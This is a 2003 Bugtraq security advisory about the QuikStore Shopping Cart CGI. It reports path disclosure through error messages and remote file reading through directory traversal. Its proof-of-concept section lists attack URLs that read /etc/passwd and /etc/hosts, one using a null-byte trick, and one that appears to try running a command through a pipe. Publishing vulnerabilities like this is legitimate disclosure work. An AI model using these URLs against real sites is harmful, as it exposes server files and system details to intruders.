QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
From: Dr`Ponidi Haryanto (drponidi_at_hackermail.com)
Date: 12/23/03
- Previous message: Micheal Cottingham: "Re: phpBB v2.06 search_id sql injection exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: bugtraq@securityfocus.com Date: Tue, 23 Dec 2003 20:48:51 +0800
Indonesia Security Development Team Advisory
QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
=====================================================================
Advisory Name: QuikStore Shopping Cart Discloses Installation Path & Files to Remote Users
Release Date: 5:08 23/12/03
Application: QuikStore Shopping Cart
Author: Dr`Ponidi <drponidi@kecoak.org>
Discover by: Dr`Ponidi <drponidi@kecoak.org>
Acknowledgments: Vulnerability discovery, exploit code, and advisory by Dr`Ponidi
Vendor Status: The vendor has been contacted
Vendor URL: http://www.quikstore.com
Reference: http://drponidi.5u.com/advisory.htm
Greetz to: #indohack #k-elektronik #dhegleng @ dal.net
[Details]
A remote user can reportedly send request to cause the system
to display an error message that indicates the installation path.
It's possible to make a malformed http request for many files in
QuikStore Shopping Cart and in doing so trigger an error.
The resulting error message will disclose potentially sensitive installation
path information to the remote attacker.QuikStore Shopping Cart allows remote
file reading too, users can view files on the system with the privileges of the web server.
[Proof of Concept]
http://[target]/cgi-bin/quikstore.cgi?store='
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts
http://[target]/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id|
[Suggestions]
Filter all files
[Patch:]
Not yet available
[About Indonesia Security Development Team]
Indonesia Security Development Team researches and develops
intelligent, advanced application security assessment. Based in
Indonesia, Indonesia Security Development Team offers the best of
breed security consulting services, specializing in shopping carts
software and network security assessments. We provide security
information and patches for use by the entire network security community.
This information is provided freely to all interested parties and may
be redistributed provided that it is not altered in any way, and that
the author is appropriately credited
Indonesia Security Development Team Advisory:
http://drponidi.5u.com/advisory.htm
_______________________________________________________________
Dr`Ponidi <drponidi@kecoak.org>
Original document can be fount at http://drponidi.5u.com/advisory.htm
-- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze
- Previous message: Micheal Cottingham: "Re: phpBB v2.06 search_id sql injection exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
